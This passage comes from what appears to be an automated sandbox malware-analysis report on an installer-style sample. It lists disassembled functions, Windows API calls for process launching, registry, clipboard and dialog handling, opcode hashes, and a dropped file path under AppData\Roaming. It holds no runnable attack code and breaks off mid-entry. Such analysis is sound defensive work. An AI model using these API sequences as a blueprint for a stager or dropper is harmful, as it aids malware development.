                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: PrivateProfileString
                                                • String ID:
                                                • API String ID: 1096422788-0
                                                • Opcode ID: c6a8cbcbc31f6e602369a5318af1bf20fc7f19c6dcae62e72b5fc0541244e301
                                                • Instruction ID: 69d349e7d285c822079f9e4bf846872a9f1ef35916f06b7134f04da07b3971da
                                                • Opcode Fuzzy Hash: c6a8cbcbc31f6e602369a5318af1bf20fc7f19c6dcae62e72b5fc0541244e301
                                                • Instruction Fuzzy Hash: 25E0487080420CAADB106FA1CE099BE7A64AF00340F104439F5907B0D1E6FC84415745
                                                Function 004060EF Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,0042C228,?,?,0040617D,0042C228,00000000,?,?,Call,?), ref: 00406113
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: Open
                                                • String ID:
                                                • API String ID: 71445658-0
                                                • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                • Instruction ID: 3f4f51c5761301f24834a255f16e5381e59d2a113ab40b24d84d285923e9a67b
                                                • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                • Instruction Fuzzy Hash: 47D0173604020DBBEF119F90ED01FAB3B6DAB08314F014826FE16A80A2D776D530AB68
                                                Function 0040424C Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(00000028,?,00000001,00404077), ref: 0040425A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: c67af3d44b601b412ad7c6a67ff551ecd195e7fe17a35a24dfb0ddc2ffe3d870
                                                • Instruction ID: 35ea918b965a0e533a09ef3704f79fc1997eb74e27ad0e26ff3c84f6d98ddf78
                                                • Opcode Fuzzy Hash: c67af3d44b601b412ad7c6a67ff551ecd195e7fe17a35a24dfb0ddc2ffe3d870
                                                • Instruction Fuzzy Hash: ACB0923A180600AADE118B40DE4AF857A62F7A4701F018138B240640B0CAB200E0DB48
                                                Function 0040332B Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetFilePointer.KERNELBASE(?,00000000,00000000,00403088,?,?,00000006,00000008,0000000A), ref: 00403339
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                Function 004058AA Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                Download Yara Rule
                                                APIs
                                                • ShellExecuteExW.SHELL32(?), ref: 004058B9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: ExecuteShell
                                                • String ID:
                                                • API String ID: 587946157-0
                                                • Opcode ID: 635164c3b06ed96bf07ad63cc2cf624e21a1ddaff933affe27173adac056c9f0
                                                • Instruction ID: 322818d701d9cc3fc85427ca8463de8bac6637280c84b784c1803e53dd53602d
                                                • Opcode Fuzzy Hash: 635164c3b06ed96bf07ad63cc2cf624e21a1ddaff933affe27173adac056c9f0
                                                • Instruction Fuzzy Hash: 55C092B2000200DFE301CF90CB08F067BF8AF59306F028058E1849A160C7788800CB69
                                                Function 00401F00 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004052E6: lstrlenW.KERNEL32(0042C228,00000000,0041D800,74DF23A0,?,?,?,?,?,?,?,?,?,0040325E,00000000,?), ref: 0040531E
                                                  • Part of subcall function 004052E6: lstrlenW.KERNEL32(0040325E,0042C228,00000000,0041D800,74DF23A0,?,?,?,?,?,?,?,?,?,0040325E,00000000), ref: 0040532E
                                                  • Part of subcall function 004052E6: lstrcatW.KERNEL32(0042C228,0040325E,0040325E,0042C228,00000000,0041D800,74DF23A0), ref: 00405341
                                                  • Part of subcall function 004052E6: SetWindowTextW.USER32(0042C228,0042C228), ref: 00405353
                                                  • Part of subcall function 004052E6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405379
                                                  • Part of subcall function 004052E6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405393
                                                  • Part of subcall function 004052E6: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A1
                                                  • Part of subcall function 00405867: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 00405890
                                                  • Part of subcall function 00405867: CloseHandle.KERNEL32(?), ref: 0040589D
                                                • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401F47
                                                  • Part of subcall function 0040670D: WaitForSingleObject.KERNEL32(?,00000064), ref: 0040671E
                                                  • Part of subcall function 0040670D: GetExitCodeProcess.KERNEL32(?,?), ref: 00406740
                                                  • Part of subcall function 004061C9: wsprintfW.USER32 ref: 004061D6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                • String ID:
                                                • API String ID: 2972824698-0
                                                • Opcode ID: a0367c61fa75c7fa1ed8603c7bcbb816b6d25ff725675df51efd44c1739e69f8
                                                • Instruction ID: 0c3abe8747980e4b1c062509ec269ea7acbc1ace6387f940061889d1bd78c20b
                                                • Opcode Fuzzy Hash: a0367c61fa75c7fa1ed8603c7bcbb816b6d25ff725675df51efd44c1739e69f8
                                                • Instruction Fuzzy Hash: F5F09032905115DBCB20FFA19D848DE62A49F01368B25057FF102F61D1C77C0E459AAE

                                                Non-executed Functions

                                                Function 00405425 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetDlgItem.USER32(?,00000403), ref: 00405483
                                                • GetDlgItem.USER32(?,000003EE), ref: 00405492
                                                • GetClientRect.USER32(?,?), ref: 004054CF
                                                • GetSystemMetrics.USER32(00000002), ref: 004054D6
                                                • SendMessageW.USER32(?,00001061,00000000,?), ref: 004054F7
                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405508
                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040551B
                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405529
                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040553C
                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040555E
                                                • ShowWindow.USER32(?,00000008), ref: 00405572
                                                • GetDlgItem.USER32(?,000003EC), ref: 00405593
                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055A3
                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055BC
                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055C8
                                                • GetDlgItem.USER32(?,000003F8), ref: 004054A1
                                                  • Part of subcall function 0040424C: SendMessageW.USER32(00000028,?,00000001,00404077), ref: 0040425A
                                                • GetDlgItem.USER32(?,000003EC), ref: 004055E5
                                                • CreateThread.KERNEL32(00000000,00000000,Function_000053B9,00000000), ref: 004055F3
                                                • CloseHandle.KERNEL32(00000000), ref: 004055FA
                                                • ShowWindow.USER32(00000000), ref: 0040561E
                                                • ShowWindow.USER32(?,00000008), ref: 00405623
                                                • ShowWindow.USER32(00000008), ref: 0040566D
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056A1
                                                • CreatePopupMenu.USER32 ref: 004056B2
                                                • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056C6
                                                • GetWindowRect.USER32(?,?), ref: 004056E6
                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004056FF
                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405737
                                                • OpenClipboard.USER32(00000000), ref: 00405747
                                                • EmptyClipboard.USER32 ref: 0040574D
                                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405759
                                                • GlobalLock.KERNEL32(00000000), ref: 00405763
                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405777
                                                • GlobalUnlock.KERNEL32(00000000), ref: 00405797
                                                • SetClipboardData.USER32(0000000D,00000000), ref: 004057A2
                                                • CloseClipboard.USER32 ref: 004057A8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                • String ID: {
                                                • API String ID: 590372296-366298937
                                                • Opcode ID: 008adb25098ef1b1bb6e7edf5b259777504a6f11eb67abc6bb5002a761aaad34
                                                • Instruction ID: 2f82927f57e7d4f45bca6e23eab998b55dded590160266c2ba262d9988700e91
                                                • Opcode Fuzzy Hash: 008adb25098ef1b1bb6e7edf5b259777504a6f11eb67abc6bb5002a761aaad34
                                                • Instruction Fuzzy Hash: 37B16970800608BFDB119FA0DD89AAE7B79FB48355F00403AFA45B61A0CB759E51DF68
                                                Function 004046E6 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetDlgItem.USER32(?,000003FB), ref: 00404735
                                                • SetWindowTextW.USER32(00000000,?), ref: 0040475F
                                                • SHBrowseForFolderW.SHELL32(?), ref: 00404810
                                                • CoTaskMemFree.OLE32(00000000), ref: 0040481B
                                                • lstrcmpiW.KERNEL32(Call,0042D248,00000000,?,?), ref: 0040484D
                                                • lstrcatW.KERNEL32(?,Call), ref: 00404859
                                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 0040486B
                                                  • Part of subcall function 004058C8: GetDlgItemTextW.USER32(?,?,00000400,004048A2), ref: 004058DB
                                                  • Part of subcall function 00406516: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\3507071243740008011.exe",0040334E,C:\Users\user\AppData\Local\Temp\,74DF3420,004035BF,?,00000006,00000008,0000000A), ref: 00406579
                                                  • Part of subcall function 00406516: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406588
                                                  • Part of subcall function 00406516: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\3507071243740008011.exe",0040334E,C:\Users\user\AppData\Local\Temp\,74DF3420,004035BF,?,00000006,00000008,0000000A), ref: 0040658D
                                                  • Part of subcall function 00406516: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\3507071243740008011.exe",0040334E,C:\Users\user\AppData\Local\Temp\,74DF3420,004035BF,?,00000006,00000008,0000000A), ref: 004065A0
                                                • GetDiskFreeSpaceW.KERNEL32(0042B218,?,?,0000040F,?,0042B218,0042B218,?,00000001,0042B218,?,?,000003FB,?), ref: 0040492E
                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404949
                                                  • Part of subcall function 00404AA2: lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B43
                                                  • Part of subcall function 00404AA2: wsprintfW.USER32 ref: 00404B4C
                                                  • Part of subcall function 00404AA2: SetDlgItemTextW.USER32(?,0042D248), ref: 00404B5F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                • String ID: A$C:\Users\user\AppData\Roaming\pechay\transskribere\jon$Call
                                                • API String ID: 2624150263-251418098
                                                • Opcode ID: 2bf24cd5b38970458feb5e26e62e94a42910e0745c64cb7450705bda54c983ff
                                                • Instruction ID: b9cd804fa769b9c0a994065299bacf789a546679ae48146ccc486c737bfd155f
                                                • Opcode Fuzzy Hash: 2bf24cd5b38970458feb5e26e62e94a42910e0745c64cb7450705bda54c983ff
                                                • Instruction Fuzzy Hash: CBA175F1A00209ABDB11AFA5CD41AAFB7B8EF84354F10847BF601B62D1D77C99418B6D
                                                Function 004020FE Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CoCreateInstance.OLE32(004085E8,?,00000001,004085D8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040217D
                                                Strings
                                                • C:\Users\user\AppData\Roaming\pechay\transskribere\jon\Ossicular, xrefs: 004021BD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: CreateInstance
                                                • String ID: C:\Users\user\AppData\Roaming\pechay\transskribere\jon\Ossicular
                                                • API String ID: 542301482-3139891972
                                                • Opcode ID: a3079df28c9350d7309c2a19df5477558aa8a9c325ce021c01e80fddd7990195
                                                • Instruction ID: 2ba5a37aa1c239f751097cd18d9f1051e5d6a8806e2346af1523e8cbd5355f1b
                                                • Opcode Fuzzy Hash: a3079df28c9350d7309c2a19df5477558aa8a9c325ce021c01e80fddd7990195
                                                • Instruction Fuzzy Hash: 504139B5A00208AFCB10DFE4C988AAEBBB5FF48314F20457AF515EB2D1DB799941CB44
                                                Function 004072B4 Relevance: 2.8, Strings: 2, Instructions: 300COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: p!C$p!C
                                                • API String ID: 0-3125587631
                                                • Opcode ID: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
                                                • Instruction ID: ef217add9e462a39eaf01b2cd615f348b30b4b8a27c4232395f9688b09cd85c2
                                                • Opcode Fuzzy Hash: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
                                                • Instruction Fuzzy Hash: 33C15831E04219DBDF18CF68C8905EEBBB2BF88314F25826AD85677380D734A942CF95
                                                Function 00402862 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402871
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: FileFindFirst
                                                • String ID:
                                                • API String ID: 1974802433-0
                                                • Opcode ID: d3449d240157211f65d4661233ebdf21600f3235833f1e3ab3d1db94ad861236
                                                • Instruction ID: dc4ef17723f846daade3f6bb5fabbbbae416fabd81b1269148e1e628f00bda2f
                                                • Opcode Fuzzy Hash: d3449d240157211f65d4661233ebdf21600f3235833f1e3ab3d1db94ad861236
                                                • Instruction Fuzzy Hash: 9DF08271A04104EFD710EBA4DD499ADB378EF00324F2105BBF515F61D1D7B44E449B1A
                                                Function 00406ADD Relevance: .3, Instructions: 334COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5a4ae33423394c5bea169515a796ff1213356ce6b05ba1201df3d6212e3a5333
                                                • Instruction ID: c2d777d08f91faa28cc29f4af1d325e94f95b1c5ec16d27d51274fd7273dd8ba
                                                • Opcode Fuzzy Hash: 5a4ae33423394c5bea169515a796ff1213356ce6b05ba1201df3d6212e3a5333
                                                • Instruction Fuzzy Hash: A4E18971A04709DFDB24CF59C880BAAB7F1EB44305F15852EE497AB2D1D778AA91CF04
                                                Function 004043B4 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 204windowstringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404452
                                                • GetDlgItem.USER32(?,000003E8), ref: 00404466
                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404483
                                                • GetSysColor.USER32(?), ref: 00404494
                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044A2
                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044B0
                                                • lstrlenW.KERNEL32(?), ref: 004044B5
                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044C2
                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044D7
                                                • GetDlgItem.USER32(?,0000040A), ref: 00404530
                                                • SendMessageW.USER32(00000000), ref: 00404537
                                                • GetDlgItem.USER32(?,000003E8), ref: 00404562
                                                • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045A5
                                                • LoadCursorW.USER32(00000000,00007F02), ref: 004045B3
                                                • SetCursor.USER32(00000000), ref: 004045B6
                                                • LoadCursorW.USER32(00000000,00007F00), ref: 004045CF
                                                • SetCursor.USER32(00000000), ref: 004045D2
                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404601
                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404613
                                                Strings
                                                Memory Dump Source
